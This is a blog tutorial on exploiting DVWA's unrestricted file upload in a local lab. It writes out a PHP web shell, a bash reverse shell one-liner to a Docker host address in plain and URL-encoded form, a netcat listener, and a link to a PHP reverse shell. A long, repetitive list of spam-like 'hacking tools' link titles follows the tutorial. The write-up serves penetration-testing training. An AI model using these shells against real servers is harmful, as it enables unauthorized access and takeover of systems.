Tuesday, January 23, 2024

Learning Web Pentesting With DVWA Part 5: Using File Upload To Get Shell

In today's article we will go through the File Upload vulnerability of DVWA. File Upload vulnerability is a common vulnerability in which a web app doesn't restrict the type of files that can be uploaded to a server. The result of which is that a potential adversary uploads a malicious file to the server and finds his/her way to gain access to the server or perform other malicious activities. The consequences of Unrestricted File Upload are put out by OWASP as: "The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, client-side attacks, or simple defacement. It depends on what the application does with the uploaded file and especially where it is stored."
For successful vulnerability exploitation, we need two things:
1. An unrestricted file upload functionality.
2. Access to the uploaded file to execute the malicious code.
To perform this type of attack on DVWA click on File Upload navigation link, you'll be presented with a file upload form like this:
Lets upload a simple text file to see what happens. I'll create a simple text file with the following command:
echo TESTUPLOAD > test.txt 
and now upload it.
The server gives a response back that our file was uploaded successfully and it also gives us the path where our file was stored on the server. Now lets try to access our uploaded file on the server, we go to the address provided by the server which is something like this:
http://localhost:9000/hackable/uploads/test.txt 
and we see the text we had written to the file. Lets upload a php file now since the server is using php. We will upload a simple php file containing phpinfo() function. The contents of the file should look something like this.
<?php phpinfo(); ?> 
Save the above code in a file called info.php (you can use any name) and upload it. Now naviagte to the provided URL:
http://localhost:9000/hackable/uploads/info.php 
and you should see a phpinfo page like this:
phpinfo page contains a lot of information about the web application, but what we are interested in right now in the page is the disable_functions column which gives us info about the disabled functions. We cannot use disabled functions in our php code. The function that we are interested in using is the system() function of php and luckily it is not present in the disable_functions column. So lets go ahead and write a simple php web shell:
<?php system($_GET["cmd"]); ?> 
save the above code in a file shell.php and upload it. Visit the uploaded file and you see nothing. Our simple php shell is looking for a "cmd" GET parameter which it passes then to the system() function which executes it. Lets check the user using the whoami command as follows:
http://localhost:9000/hackable/uploads/shell.php?cmd=whoami 
we see a response from the server giving us the user under which the web application is running.
We can use other bash commands such as ls to list the directories. Lets try to get a reverse shell now, we can use our existing webshell to get a reverse shell or we can upload a php reverse shell. Since we already have webshell at our disposal lets try this method first.
Lets get a one liner bash reverseshell from Pentest Monkey Reverse Shell Cheat Sheet and modify it to suit our setup, but we first need to know our ip address. Enter following command in a terminal to get your ip address:
ifconfig docker0 
the above command provides us information about our virtual docker0 network interface. After getting the ip information we will modify the bash one liner as:
bash -c 'bash -i >& /dev/tcp/172.17.0.1/9999 0>&1' 
here 172.17.0.1 is my docker0 interface ip and 9999 is the port on which I'll be listening for a reverse shell. Before entering it in our URL we need to urlencode it since it has some special characters in it. After urlencoding our reverse shell one liner online, it should look like this:
bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.17.0.1%2F9999%200%3E%261%27 
Now start a listener on host with this command:
nc -lvnp 9999 
and then enter the url encoded reverse shell in the cmd parameter of the url like this:
http://localhost:9000/hackable/uploads/shell.php?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.17.0.1%2F9999%200%3E%261%27 
looking back at the listener we have a reverse shell.
Now lets get a reverse shell by uploading a php reverse shell. We will use pentest monkey php reverse shell which you can get here. Edit the ip and port values of the php reverse shell to 172.17.0.1 and 9999. Setup our netcat listener like this:
nc -lvnp 9999 
and upload the reverse shell to the server and access it to execute our reverse shell.
That's it for today have fun.

References:

  1. Unrestricted File Upload: https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload
  2. Reverse Shell Cheat Sheet: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
  3. Php Reverse Shell (Pentest Monkey): https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

Read more


  1. Hack Tools
  2. Pentest Tools For Mac
  3. Pentest Tools Windows
  4. Pentest Tools Port Scanner
  5. Hacker Tools Hardware
  6. Pentest Tools Online
  7. New Hacker Tools
  8. Easy Hack Tools
  9. Hacker Hardware Tools
  10. Hacking Tools For Kali Linux
  11. Pentest Tools Free
  12. Hacking Tools Name
  13. Hacking Tools For Windows 7
  14. Hacking Tools And Software
  15. Hack Tools Pc
  16. Ethical Hacker Tools
  17. Hack Tools 2019
  18. Pentest Tools
  19. What Is Hacking Tools
  20. Hacking Tools For Pc
  21. Hacking Apps
  22. Tools 4 Hack
  23. Hacker Techniques Tools And Incident Handling
  24. Blackhat Hacker Tools
  25. Hacking Tools Software
  26. Pentest Tools Github
  27. Pentest Tools Url Fuzzer
  28. Pentest Tools Apk
  29. Pentest Tools Review
  30. Install Pentest Tools Ubuntu
  31. Hacker Tools 2020
  32. Hackrf Tools
  33. Hak5 Tools
  34. Hacker Tools Free
  35. Hacker Tools For Pc
  36. Hacker Tools Mac
  37. How To Make Hacking Tools
  38. Pentest Tools List
  39. Hacking Tools Download
  40. Growth Hacker Tools
  41. Hacking Tools For Games
  42. Hack Rom Tools
  43. Pentest Tools List
  44. Hacking Tools Pc
  45. Pentest Tools Linux
  46. Hack Tools For Games
  47. Hack Tools Online
  48. Hacker Tools Online
  49. Pentest Reporting Tools
  50. Pentest Box Tools Download
  51. Computer Hacker
  52. Tools For Hacker
  53. Pentest Tools List
  54. Pentest Tools Tcp Port Scanner
  55. Hacker Tool Kit
  56. Pentest Tools Free
  57. Hacking Tools For Pc
  58. Pentest Tools Apk
  59. Hacking App
  60. Hacker Tools Free
  61. What Are Hacking Tools
  62. Hack Tools Mac
  63. Pentest Tools Apk
  64. Pentest Tools Review
  65. Pentest Tools Website
  66. Hacking Tools Online
  67. Pentest Tools Apk
  68. Underground Hacker Sites
  69. Pentest Tools Bluekeep
  70. Nsa Hacker Tools
  71. Pentest Tools Website Vulnerability
  72. Hacking Tools Online
  73. Hacking Tools Usb
  74. Hack Tools Online
  75. Hacking Tools Mac
  76. Hacking Tools For Kali Linux
  77. Nsa Hack Tools Download
  78. Hack Tools Download
  79. Tools For Hacker
  80. Hacker Tools For Ios
  81. Bluetooth Hacking Tools Kali
  82. Pentest Box Tools Download
  83. Hacker Tools Online
  84. Best Pentesting Tools 2018
  85. Pentest Tools Find Subdomains
  86. Hack Tools Online
  87. Pentest Tools Kali Linux
  88. What Is Hacking Tools
  89. Hacking Tools Usb
  90. Pentest Tools Alternative
  91. Hacking Tools Github
  92. Tools Used For Hacking
  93. Blackhat Hacker Tools
  94. Tools 4 Hack
  95. Hacker Tools
  96. Hacking Tools Download
  97. Termux Hacking Tools 2019
  98. Hacker Tool Kit
  99. Top Pentest Tools
  100. Hacking Tools For Beginners
  101. Hacking Tools Free Download
  102. Hacker Tools For Ios
  103. Hacking Tools 2020
  104. Hacking Tools Windows
  105. Pentest Tools Online

No comments: